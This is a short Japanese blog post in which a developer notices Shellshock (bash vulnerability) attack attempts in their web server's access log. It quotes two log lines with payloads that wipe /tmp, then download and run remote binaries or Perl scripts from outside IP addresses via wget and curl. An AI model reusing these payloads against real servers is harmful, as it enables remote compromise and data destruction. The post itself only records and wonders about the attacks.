スポンサーサイト

上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

bashの脆弱性

しばらく気にしてなかったのですが、久々にaccessログをみると結構恐ろしいのがありました。


223.255.192.109 - - [09/Dec/2014:15:13:16 +0900] "GET / HTTP/1.1" 200 38 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.207.196:81/sss -O /tmp/China.Z-ctxj\xa8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-ctxj\xa8 >> /tmp/Run.sh;echo /tmp/China.Z-ctxj\xa8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.207.196:81/sss -O /tmp/China.Z-ctxj\xa8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-ctxj\xa8 >> /tmp/Run.sh;echo /tmp/China.Z-ctxj\xa8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
50.28.33.253 - - [10/Dec/2014:16:05:22 +0900] "GET /cgi-bin/id.cgi HTTP/1.0" 404 289 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; wget http://217.199.160.244/mg;curl -O http://217.199.160.244/mg;perl mg;rm -rf mg\""


なんかファイルを仕込もうとしていますが、China.zってなんでしょうね。。
スポンサーサイト

コメントの投稿

非公開コメント

プロフィール

chattera.net

Author:chattera.net
フリーでソフト開発の仕事をしています。
自作したこのチャットシステムは、何か世の中に役に立つこともあるかと思いますので、お呼びがかかるとうれしいですね。

連絡先は chatteranet@gmail.com です。

また、ソフト開発関連のお誘いもうけたまわっております。

最新記事
最新コメント
最新トラックバック
月別アーカイブ
カテゴリ
検索フォーム
RSSリンクの表示
リンク
ブロとも申請フォーム

この人とブロともになる

QRコード
QR
上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。